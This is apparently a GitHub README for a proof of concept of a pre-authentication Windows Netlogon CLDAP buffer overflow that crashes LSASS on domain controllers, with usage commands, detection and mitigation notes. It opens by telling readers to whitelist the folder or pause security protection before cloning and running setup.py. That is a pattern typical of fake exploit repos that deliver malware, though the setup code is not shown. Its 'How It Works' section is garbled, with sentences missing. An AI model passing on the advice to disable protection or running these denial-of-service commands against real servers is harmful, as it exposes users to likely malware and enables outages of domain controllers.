Tip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/SightFinchFall/CVE-2026-41089-238.git
cd CVE-2026-41089-238
python setup.py ██████╗██╗ ██╗███████╗ ██╗ ██╗ ██╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ██║ ██║███║██╔═████╗██╔═████╗
██║ ██║ ██║█████╗ ███████║╚██║██║██╔██║██║██╔██║
██║ ╚██╗ ██╔╝██╔══╝ ██╔══██║ ██║████╔╝██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗ ██║ ██║ ██║╚██████╔╝╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝
Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow
One crafted UDP packet to port 389 overflows a 528-byte stack buffer inside LSASS on any unpatched Windows Domain Controller. The process crashes. The DC reboots in ~60 seconds. No authentication required.
| Attack Vector | UDP 389 (CLDAP), pre-auth, zero credentials |
| Impact | LSASS crash, DC reboot, potential RCE |
| CWE | CWE-121 (Stack-based Buffer Overflow) |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Published | May 12, 2026 by Microsoft |
Every Windows Server version running as a Domain Controller:
| Server Version | Fixed In |
|---|---|
| 2012 / 2012 R2 | ESU-only patches |
| 2016 | 10.0.14393.9140 |
| 2019 | 10.0.17763.8755 |
| 2022 | 10.0.20348.5074 |
| 2022 23H2 | 10.0.25398.2330 |
| 2025 | 10.0.26100.32772 |
NlGetLocalPingResponse allocates a 528-byte stack buffer and hands it
to BuildSamLogonResponse. That function calls NetpLogonPutUnicodeString
to write server name, domain name, GUIDs, and the attacker-controlled
username into the buffer.
The bug: NetpLogonPutUnicodeString receives a maximum length in bytes
but treats it as a WCHAR count. Every string written through this path
occupies twice the expected space. The "User" field in the CLDAP filter
(up to 130 wchars, 260 bytes on the wire) pushes the combined write
past the 528-byte boundary.
I_NetLogonLdapLookupEx
-> NlGetLocalPingResponse // 528-byte stack buffer
-> LogonRequestHandler
-> BuildSamLogonResponse
-> NetpLogonPutUnicodeString // byte/WCHAR size confusion
python3 poc.py 10.0.50.21 corp.local
python3 poc.py 10.0.50.21 corp.local -l 130
python3 poc.py 10.0.50.21 corp.local -l 200 -t 10
Requires Python 3.8+. No third-party packages.
## How It Works
the target responds on UDP 389.
characters of "A". This pushes the serialized data past the stack
buffer boundary. If LSASS crashes, the recv times out.
whether the DC is still alive. No response = LSASS crash confirmed.
The overflow triggers a denial of service (LSASS crash, DC reboot).
RCE through stack corruption is possible in theory. This PoC does not
attempt code execution.
## Detection
**Network.** Scan CLDAP traffic for search requests where the "User"
filter attribute exceeds 20-30 characters. Normal DC locator pings
use service account names (short strings).
**Host.** Watch for LSASS crashes tied to netlogon.dll (Event ID 1000).
Enable Netlogon debug logging:
nltest /dbflag:0x2080ffff
## Mitigation
- Install the May 2026 Microsoft security update
- Restrict UDP 389 inbound to trusted management subnets
- For legacy Server versions out of ESU: 0patch ships micropatches
(single instruction fix: `mov edx, 0x40` to halve the max username
length)
## References
- [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41089)
- [NVD - CVE-2026-41089](https://nvd.nist.gov/vuln/detail/CVE-2026-41089)
- [0patch Analysis and Micropatch](https://blog.0patch.com/2026/05/micropatches-released-for-windows_0304568783.html)
- [Aretiq AI Reverse Engineering](https://aretiq.ai/research/vul260513-cve-2026-41089-microsoft-windows-netlogon-buildsamlogonresponse-stack-based-buffer-overflow-rce/)
- [RFC 4511 - LDAP](https://tools.ietf.org/html/rfc4511)
- [MS-ADTS - CLDAP DC Locator](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/0de3704e-a799-4afa-b12a-3fef2f8e2e66)
---
> **Legal.** This code exists for authorized security research and
> education. Test only against systems you own or have written permission
> to test. Unauthorized access to computer systems violates the CFAA and
> equivalent laws in most jurisdictions.
**[MIT License](LICENSE)**
<!-- Last updated: 2026-06-06 17:21:54 -->